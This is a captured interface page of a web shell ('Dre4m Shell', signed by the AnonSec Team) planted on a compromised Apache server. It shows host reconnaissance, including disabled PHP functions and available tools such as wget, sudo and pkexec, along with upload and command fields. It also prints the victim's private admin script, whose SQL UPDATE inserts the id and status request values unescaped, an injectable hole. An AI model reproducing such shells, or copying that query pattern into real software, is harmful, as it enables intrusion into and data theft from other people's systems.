Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 3.21.186.117
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /var/www/html/admin//email-edit-action.php
<?php
ob_start();
session_start();
require_once('session-check.php');
require_once('include/db-config.php');
/*$sql = "select ID from maintrainer_emaildetails where EmailID = '".$_POST['emailid']."'";
$result=mysqli_query($conn,$sql);
if($row=mysqli_fetch_array($result))
{
	$url = "Location: email-edit.php?r=1";
	header($url);
	exit;
} */
$emailid=mysqli_real_escape_string($conn,stripslashes($_POST['emailid']));
$fname=mysqli_real_escape_string($conn,stripslashes($_POST['fname']));
//$mname=mysqli_real_escape_string($conn,stripslashes($_POST['mname']));
$lname=mysqli_real_escape_string($conn,stripslashes($_POST['lname']));
$cname=mysqli_real_escape_string($conn,stripslashes($_POST['cname']));
$title=mysqli_real_escape_string($conn,stripslashes($_POST['title']));
$city=mysqli_real_escape_string($conn,stripslashes($_POST['city']));
$state=mysqli_real_escape_string($conn,stripslashes($_POST['state']));
$country=mysqli_real_escape_string($conn,stripslashes($_POST['country']));
$comment = mysqli_real_escape_string($conn,stripslashes($_POST['comment']));
$status=$_POST['status'];
$EditedDate=date("Y-m-d ");

$sql="update maintrainer_emaildetails set FirstName = '".$fname."', LastName = '".$lname."', CompanyName = '".$cname."', Title = '".$title."', City = '".$city."', State = '".$state."', Country = '".$country."', EmailID = '".$emailid."', EditedDate = '".$EditedDate."', Status = ".$status.", Comment = '".$comment."', EmailAdded_Admin = '1' where ID = ".$_POST['id'];
$result=mysqli_query($conn,$sql);
$url = "Location: email-mgt.php?r=2";
header($url);
?>

Anon7 - 2022
AnonSec Team